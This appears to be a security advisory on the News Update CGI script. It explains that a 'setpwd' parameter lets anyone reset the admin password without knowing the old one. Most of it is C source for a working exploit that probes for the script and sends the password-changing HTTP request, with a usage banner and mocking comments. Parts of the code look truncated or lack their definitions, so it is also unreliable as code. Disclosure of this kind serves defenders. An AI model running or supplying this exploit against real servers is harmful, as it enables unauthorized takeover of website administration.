News Update was designed to assist with the building and maintaining of news areas. The CGI provides an easy interface for adding new news items, and creates the complete HTML from predefined templates.
The CGI has a built-in password protection that should prevent unauthorized users from adding or deleting news. Not only can this built-in password protection be circumvented, but it can also be made to assign a new password.
Credit:
The information has been provided by Morpheusbd.
By supplying the "setpwd" parameter, the function "setpwd" is called, the function allows changing of the current password.
The "setpwd" parameter needs two additional parameters: "pwd" and "pwd2".
The parameter "pwd" contains the new password.
The parameter "pwd2" is used as a confirmation of the first one, "pwd". Note: The original password isn't required for any of these actions.
Standard disclaimer applies here. Do not use this program. This program
is only for educational purposes. Use it on your on risk.
***************************************************************************/
/***************************************************************************
* *
* This program is free software; you can redistribute it and/or modify *
* it under the terms of the GNU General Public License as published by *
* the Free Software Foundation; either version 2 of the License, or *
* (at your option) any later version. *
* *
***************************************************************************/
/* At the moment everything will be written to the STDOUT */
#define EXPLOIT_INFO 2 /* If you only want Exploit infos ... change it to 1 and DEBUG to 1 */
#define DEBUG_INFO 2 /* If you only want Debug infos ... change DEBUG to 2 */
static ssize_t my_read(int fd, char *ptr)
/* Taken from UNIX Network Programming - Vol. I by W.R. Stevens */
{
static int read_cnt = 0;
static char *read_ptr;
static char read_buf[4096];
if (read_cnt <= 0) {
again:
if ( (read_cnt = read(fd, read_buf, sizeof(read_buf))) < 0) {
if (errno == EINTR)
goto again;
return(-1);
} else if (read_cnt == 0)
return(0);
read_ptr = read_buf;
}
read_cnt--;
*ptr = *read_ptr++;
return(1);
}
ssize_t readline(int fd, void *vptr, size_t maxlen)
/* Taken from UNIX Network Programming - Vol. I by W.R. Stevens */
{
int n, rc;
char c, *ptr;
ptr = vptr;
for (n = 1; n < maxlen; n++) {
if ( (rc = my_read(fd, &c)) == 1) {
*ptr++ = c;
if (c == '\n')
break; /* newline is stored, like fgets() */
} else if (rc == 0) {
if (n == 1)
return(0); /* EOF, no data read */
else
break; /* EOF, some data was read */
} else
return(-1); /* error, errno set by read() */
}
/* Exploited das News Update script und schleu?t ein neues Password ein */
int news_update_exploit(char *host, char *path)
{
int i = 0, sockfd = 0;
char cmd[MAXBUFFER];
if ((sockfd = http_connection(host)) == -1) { ROT; printf("Damn ... no connection to %s\n", host); WEISS; return; }
i = snprintf(cmd, sizeof(cmd), NEWS_UPDATE_PWD, path, host, "www.brightdarkness.de", BROWSER, 34 + strlen(PWD), PWD, PWD);
GELB;
if (DEBUG == DEBUG_INFO) { GELB; printf("Sending following request to %s[%d]:\n%s", host, 80, cmd); WEISS; }
WEISS;
if (writen(sockfd, cmd, i) == -1)
{
ROT;
printf("Man, man, man ....... Ihr verdammten Idioten .... kann man hier nicht mal in Ruhe writen() ?\n");
WEISS;
exit(-1);
}
GELB;
if (DEBUG == DEBUG_INFO) printf("Output from Server:\n");
WEISS;
while (readline(sockfd, cmd, MAXBUFFER) != 0)
{
BLAU;
if (DEBUG == DEBUG_INFO) printf("%s", cmd);
WEISS;
if (strstr(cmd, "Password Success") != NULL)
{
GRUEN;
if (DEBUG == EXPLOIT_INFO) printf("Exploit: Success!!!!\n");
if (DEBUG == EXPLOIT_INFO) printf("The new password: %s\n", PWD);
WEISS;
return (0);
}
}
ROT;
if (DEBUG == EXPLOIT_INFO) printf("Exploit: failed.\n");
WEISS;
return (-1);
}
/* How to use this fucking lame proggy *rofl* */
void usage(char *arg)
{
ROT;
printf("news_update_exploit - News Update Password Changer - v0.1\n");
printf("------------=====||| by Morpheus[bd] |||=====------------\n");
GELB;
printf("\nUsage:");
GRUEN;
printf("%s host/ip [path]\n\n", arg);
printf("path: alternative path to the newsup.pl\n");
WEISS;
exit(-1);
}
/* Existiert das Verzeichnis der Form ?berhaupt ? */
int check_directory(char *host, char *ptr)
{
int i = 0, sockfd = 0;
char cmd[MAXBUFFER], *ptr2;
GELB;
if (DEBUG == DEBUG_INFO) printf("Checking if %s exists on the target server...\n", ptr);
WEISS;
if ((sockfd = http_connection(host)) == -1) { ROT; printf("Damn !!!... No connection to %s.\n", host); WEISS; return; }
i = snprintf(cmd, sizeof(cmd), SIMPLE_REQUEST, ptr, host);
GELB;
if (DEBUG == DEBUG_INFO) printf("Sending following request to %s[%d]:\n%s", host, 80, cmd);
WEISS;
if (writen(sockfd, cmd, i) == -1)
{
ROT;
printf("Man, man, man ....... Ihr verdammten Idioten .... kann man hier nicht mal in Ruhe writen() ?\n");
WEISS;
exit(-1);
}
if (readline(sockfd, cmd, MAXBUFFER) == 0)
{
ROT;
printf("Error: Reading from HTTP Server.\n");
WEISS;
exit(-1);
}
if (strstr(cmd, "404") == NULL)
{
GRUEN;
if (DEBUG == DEBUG_INFO) printf("The directory was found.\n");
WEISS;
while (readline(sockfd, cmd, MAXBUFFER) != 0);
close(sockfd);
return (0);
}
if (DEBUG == DEBUG_INFO) printf("The directory was NOT found.\n");
while (readline(sockfd, cmd, MAXBUFFER) != 0);
close(sockfd);
return (-1);
}
/* Das tolle Hauptprogramm *fg* */
int main(int argc, char **argv)
{
char buf[MAXBUFFER];
if (argc < 2)
{
usage(argv[0]);
}
if (argc >= 3)
{
/* Ein alternatives Verzeichnis wurde als Parameter ?bergeben */
strncpy(buf, argv[2], sizeof(buf));
if (check_directory(argv[1], buf) == -1)
{
ROT;
printf("Error: The given directory was not found.\nPlease provide a different directory.\n");
WEISS;
exit(-1);
}
strcat(buf, NEWS_UPDATE);
}
else
{
/* Kein alternatives Verz. angegeben, benutze Standard-Verzeichnis */
strncpy(buf, NEWSUPDATE_PATH, sizeof(buf));
if (check_directory(argv[1], buf) == -1)
{
ROT;
printf("Error: The given directory was not found.\nPlease provide a different directory.\n");
WEISS;
exit(-1);
}
strcat(buf, NEWS_UPDATE);
}
/* Let's rock !!!! */
news_update_exploit(argv[1], buf);
return (0);
}
